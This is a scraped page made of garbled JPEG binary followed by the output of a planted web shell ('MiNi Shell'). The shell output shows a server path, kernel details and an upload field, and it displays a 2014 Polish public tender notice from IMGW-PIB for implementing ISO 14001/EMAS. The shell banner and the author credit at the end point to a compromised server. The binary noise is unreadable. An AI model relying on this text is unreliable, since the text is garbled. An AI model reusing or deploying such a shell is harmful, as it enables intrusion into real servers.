JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/87308-N-2014.html

<p class="kh_header"><b>Warszawa: Opracowanie i wdrożenie systemu zarządzania środowiskowego według wymagań normy ISO 14001 i Rozporządzenia EMAS w Oddziałach IMGW-PIB</b><br>
<b>Numer ogłoszenia: 87308 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Meteorologii i Gospodarki Wodnej - Państwowy Instytut Badawczy , ul. Podleśna 61, 01-673 Warszawa, woj. mazowieckie, tel. 22 5694230, 5694416, 5694263, faks 22 5694415.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PAŃSTWOWY  INSTYTUT BADAWCZY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i wdrożenie systemu zarządzania środowiskowego według wymagań normy ISO 14001 i Rozporządzenia EMAS w Oddziałach IMGW-PIB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólne informacje na temat EMAS
System EMAS jest jednym z istotnych narzędzi stosowanych dla skutecznej realizacji polityki Unii Europejskiej. Podstawę prawną systemu EMAS w krajach UE stanowi: rozporządzenie Parlamentu Europejskiego i Rady (WE) nr 1221/2009 z dnia 25 listopada 2009r. w sprawie dobrowolnego udziału organizacji w systemie ekozarządzania i audytu we Wspólnocie (EMAS), które weszło w życie 11 stycznia 2010r. W Polsce aktem prawnym regulującym EMAS jest ustawa z dnia 15 lipca 2011r o krajowym systemie ekozarządzania i audytu EMAS ( Dz. U Nr 178,poz. 1060). Jednym z podstawowych elementów systemu EMAS w każdej organizacji jest wdrożenie systemu zarządzania środowiskowego (dalej SZŚ) zgodnie z wymaganiami normy PN-EN ISO 14001:2005 Systemy zarządzania środowiskowego. Wymagania i wytyczne stosowania.
Podstawowym celem programu jest wprowadzenie takich zachowań użytkowników środowiska, w polskim prawie nazywanych też podmiotami korzystającymi ze środowiska, które prowadzą do ciągłego ograniczania negatywnego oddziaływania na środowisko, spełniania coraz wyższych wymagań prawnych z zakresu ochrony środowiska, wykorzystywania czystych technologii, zapobiegania powstawaniu lub redukowaniu ilości wytwarzanych odpadów oraz pełnego i kompetentnego informowania lokalnych społeczności o oddziaływaniach na środowisko, związanych z danym rodzajem działalności. EMAS kładzie ogromny nacisk na przestrzeganie przepisów prawa środowiskowego, komunikowanie się z przedsiębiorstwem i wewnątrz przedsiębiorstwa oraz poprawę działalności środowiskowej. Celem Rozporządzenia jest także zachęcenie firm do dialogu z różnego rodzaju grupami zainteresowanymi ich działalnością środowiskową.
Założenia i podstawowe zasady EMAS to:
- dobrowolność - udział w programie jest dobrowolny, a przystępując do niego organizacja zobowiązuje się do wdrożenia i/lub utrzymania systemu zarządzania środowiskowego, prowadzenia cyklicznych audytów i publikowania informacji na zasadach podanych w Rozporządzeniu; w zamian za to, po weryfikacji przez niezależnego, akredytowanego weryfikatora środowiskowego - publicznej deklaracji oraz zgodności z wymaganiami EMAS, jej nazwa umieszczona jest w specjalnych rejestrach - krajowym i unijnym; zarejestrowana organizacja zyskuje również prawo do posługiwania się logo EMAS,
- dostępność - w programie może uczestniczyć każda organizacja działająca na terenie Unii Europejskiej,
- jawność danych - jednym z elementów programu jest publikowanie tzw. Deklaracji środowiskowych, zawierających wiarygodne informacje środowiskowe, w tym informacje o podejmowanych działaniach środowiskowych i ich efektach,
- okresowość - prowadzenie działań w oparciu o zasadę ciągłego doskonalenia, tzw. Pętla ciągłego doskonalenia: ustalenie polityki środowiskowej, planowanie działań, realizacja przyjętych planów oraz weryfikacja osiągniętych celów, 
- niezależna weryfikacja - organizacje są okresowo sprawdzane przez niezależnych weryfikatorów środowiskowych i okresowe odnawiania rejestracji. 

Informacje o Oddziałach IMGW-PIB 
1. Zgodnie z Regulaminem Organizacyjnym IMGW - PIB oddziały stanowią oddzielne jednostki organizacyjne IMGW-PIB, kierują nimi dyrektorzy oddziałów podlegli bezpośrednio Dyrektorowi IMGW-PIB. 
2. W Oddziałach IMGW-PIB realizowane są zadania państwowej służby hydrologiczno-meteorologicznej, państwowej służby ds. bezpieczeństwa budowli piętrzących, badania naukowe oraz pozostała działalność administracyjno -techniczna. Działalność administracyjna jest zlokalizowana głównie w siedzibach Oddziałów (Kraków, Gdynia, Wrocław, Katowice) oraz siedzibie Narodowego Centrum Modelowania Powodzi i Suszy w Poznaniu. Na stacjach wykonywane są głównie pomiary meteorologiczne i hydrologiczne. Lista obejmująca adresy siedzib Oddziałów i stacji IMGW-PIB znajduje się w załączeniu (załącznik nr 1). Zastrzega się, że w związku ze zmianami organizacyjnymi adresy stacji mogą się zmieniać.
3. Liczba osób zatrudnionych w oddziałach wg stanu na koniec stycznia 2014r.
Oddział Morski w Gdyni  209,  
Ośrodek Technicznej Kontroli Zapór w Katowicach 97,
Oddział w Krakowie 487, 
Oddział we Wrocławiu326,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.41.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. 
Zamawiający nie ustanawia minimalnego pułapu wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) z należytą starannością:
Warunek nr 1: wdrożenie systemu EMAS potwierdzone rejestracją w systemie ekozarządzania i audytu w co najmniej dwóch polskich organizacjach (powyżej 300 pracowników). Co najmniej jedna z tych organizacji powinna posiadać strukturę oddziałową.
Warunek 2: co najmniej jedną pracę o tematyce związanej z ochroną środowiska, o wartości  co najmniej  300 000,00 PLN brutto (słownie: trzysta tysięcy  zł)
Przez pracę związaną z ochroną środowiska należy rozumieć: raporty o oddziaływaniu na środowisko, wnioski o pozwolenie zintegrowane lub jego zmianę, przeglądy ekologiczne, programy gospodarki odpadami, analizy kosztów środowiskowych oraz inne opracowania specjalistyczne o tematyce związanej z ochroną środowiska.
Ocena spełnienia warunku na minimalnym poziomie zostanie dokonana w oparciu o  dokument załączony do Wniosku o dopuszczenie do udziału w postępowaniu - Wykaz usług (Doświadczenie Wykonawcy)
Wzór Wykazu usług (Doświadczenie Wykonawcy) został zamieszczony na stronie internetowej Zamawiającego pod ogłoszeniem o zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. 
Zamawiający nie ustanawia minimalnego pułapu wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, ze dysponuje lub będzie dysponował niżej wymienionymi: 
1. Kierownik zespołu (1 osoba) akredytowany lub licencjonowany weryfikator środowiskowy systemu EMAS (obejmuje to osoby uprawnione do prowadzenia auditów EMAS w ramach akredytacji weryfikatora EMAS), który pełnił rolę Kierownika zespołu w minimum 3 projektach polegających na wdrożeniu EMAS, zakończonych rejestracją w systemie EMAS (co najmniej jedna z tych organizacji powinna posiadać strukturę oddziałową) oraz wykonał co najmniej 10 auditów weryfikacyjnych i/lub nadzoru EMAS. Kompetencje dot. posiadania uprawnień akredytowanego lub licencjonowanego weryfikatora środowiskowego systemu EMAS powinny być potwierdzone licencją lub akredytacją zgodną z Rozporządzeniem Parlamentu Europejskiego i Rady (WE) Nr 1221/2009 z dnia 25 listopada 2009r. w sprawie dobrowolnego udziału organizacji w systemie ekozarządzania i audytu we Wspólnocie (EMAS), uchylające rozporządzenie (WE) nr 761/2001 oraz decyzje Komisji 2001/681WE i 2006/193/WE (Dz.U.UE.L 09.342.1).
2. Konsultanci (3 osoby) w tym:
a. 1 osoba - akredytowany lub licencjonowany weryfikator środowiskowy systemu EMAS (obejmuje to osoby uprawnione do prowadzenia auditów EMAS w ramach akredytacji weryfikatora EMAS), brał udział w co najmniej 1 projekcie polegającym na wdrożeniu EMAS oraz wykonał co najmniej 5 auditów weryfikacyjnych i/lub nadzoru EMAS, 
b. 1 osoba - specjalista w zakresie systemu EMAS, posiadająca wiedzę w zakresie wdrożenia EMAS potwierdzoną wykonaniem co najmniej 3 projektów i poprowadzeniem szkoleń w zakresie EMAS lub ukończeniem (potwierdzonym uzyskaniem certyfikatu) co najmniej 3 dni szkoleniowych w zakresie EMAS 
c. 1 osoba która przeprowadziła co najmniej 6 szkoleń z zakresu systemu zarządzania środowiskowego, w tym przynajmniej 3 szkolenia dla audytorów SZŚ. Czas jednego szkolenia wynosił nie mniej niż 2 dni szkoleniowe, a każdy dzień szkoleniowy nie był krótszy niż 5 godzin. 
Ocena spełnienia warunku zostanie dokonana w oparciu o  dokument załączony do Wniosku o dopuszczenie do udziału w postępowaniu - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia.
Wzór Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia został zamieszczony na stronie internetowej Zamawiającego pod ogłoszeniem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana w oparciu o oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. 
Zamawiający nie ustanawia minimalnego pułapu wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Formularz wniosku o dopuszczenie do udziału w postępowaniu 
II. Pełnomocnictwo
1. Pełnomocnictwo do reprezentowania musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony
2.  Pełnomocnictwo wymagane jest w przypadku gdy:
a. Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
b. Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza; 
3. Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia powinno wyraźnie wskazywać:
1) jakiego postępowania dotyczy,
2) jakie podmioty występują wspólnie,
3) kto w imieniu tych podmiotów ma pełnić funkcję pełnomocnika,
4) jakie konkretne czynności w postępowaniu ma prawo wykonywać pełnomocnik,
5) na jaki okres jest udzielone.
4. Jeśli pełnomocnik ma być uprawniony do wykonywania czynności nie tylko w imieniu wszystkich Wykonawców występujących wspólnie, lecz również w imieniu każdego z tych Wykonawców z osobna, to należy taką informację zamieścić w treści pełnomocnictwa.
III. W przypadku polegania na zasobach innych podmiotów zobowiązanie, w szczególności pisemne, innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu
Wykonawcom, spełniającym warunki udziału w postępowaniu, Zamawiający przyzna punkty w zakresie doświadczenia zgodnie z następującymi zasadami: 
Doświadczenie Wykonawcy: Warunek 1 za każde zrealizowane zamówienie ponad wymagane minimum określone w pkt III.3.2) warunek nr 1 - Wykonawca otrzyma 1 punkt.
Za każde zrealizowane zamówienie ponad wymagane minimum określone w III.3.2) warunku nr 2 - Wykonawca otrzyma 1 punkt. 
Zamawiający zaprosi do składania ofert nie więcej niż 5 wykonawców. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu Zamawiający zaprosi do złożenia oferty Wykonawców, którzy otrzymali najwyższe oceny spełnienia warunków (otrzymali najwyższą liczbę punktów). 
Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie mniejsza niż 5, Zamawiający zaprosi do składania ofert  tylko tych Wykonawców, którzy spełniają warunki udziału w postępowaniu.
W przypadku gdy, nie będzie można dokonać zakwalifikowania dokładnie 5 Wykonawców z uwagi na to że dwóch lub więcej Wykonawców uzyska taka samą liczbę punktów Zamawiający zaprosi do składania ofert wszystkich tych Wykonawców (np. na 5 miejscu dwóch lub więcej Wykonawców) którzy uzyskali taką samą liczbę punktów).</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - WARTOŚĆ TECHNICZNA OFERTY - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany Umowy mogą być dokonywane jedynie w formie pisemnej pod rygorem nieważności, 
z uwzględnieniem art. 144  ust. 1 Prawa zamówień publicznych.
2. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień Umowy w stosunku do treści Umowy w sytuacji gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, a w szczególności pojawienia się:
1)	nowych technologii umożliwiających skrócenie terminu realizacji zamówienia lub podniesienie jakości usług realizowanych w ramach zamówienia, 
2)	zmian lub wejścia w życie przepisów prawa polskiego w zakresie realizowanych prac, 
3)	zmian w innych, powiązanych z przedmiotem zamówienia przedsięwzięciach realizowanych lub przewidzianych do realizacji przez Zamawiającego, których to zmian nie można było przewidzieć w chwili zawarcia Umowy, wpływających na zakres, sposób lub terminy realizacji przedmiotu zamówienia, 
4)	zmian w organizacji Zamawiającego, wpływających na zakres, sposób lub terminy realizacji przedmiotu zamówienia, 
5)	zmian podejścia do realizacji wymagań opisanych w Załącznikach do Umowy, jeżeli taka zmiana wynika 
z nieprzewidzianych i niezależnych od Zamawiającego i Wykonawcy okoliczności, które wystąpiły w trakcie realizacji przedmiotu zamówienia oraz zmiana ta nie powoduje ograniczenia korzyści Zamawiającego, 
6)	zaistnienia innej okoliczności prawnej, ekonomicznej lub technicznej, skutkującej niemożliwością wykonania lub należytego wykonania Umowy zgodnie z SIWZ,
7)	zmiany osoby skierowanej do realizacji przedmiotowego zamówienia - zmiana taka może nastąpić wyłącznie po uprzednim zawiadomieniu Zamawiającego oraz przekazaniu dokumentów potwierdzających posiadanie odpowiednich kwalifikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana Wykonawcom, którzy zostaną zaproszeni do składania ofert (art. 51 ust. 4 ustawy PZP)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 09:30, miejsce: INSTYTUT METEORLOGII I GOSPODARKI WODNEJ PAŃSTWOWY INSTYTUT BADAWCZY, ul. Podleśna 61, 01-673 WARSZAWA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com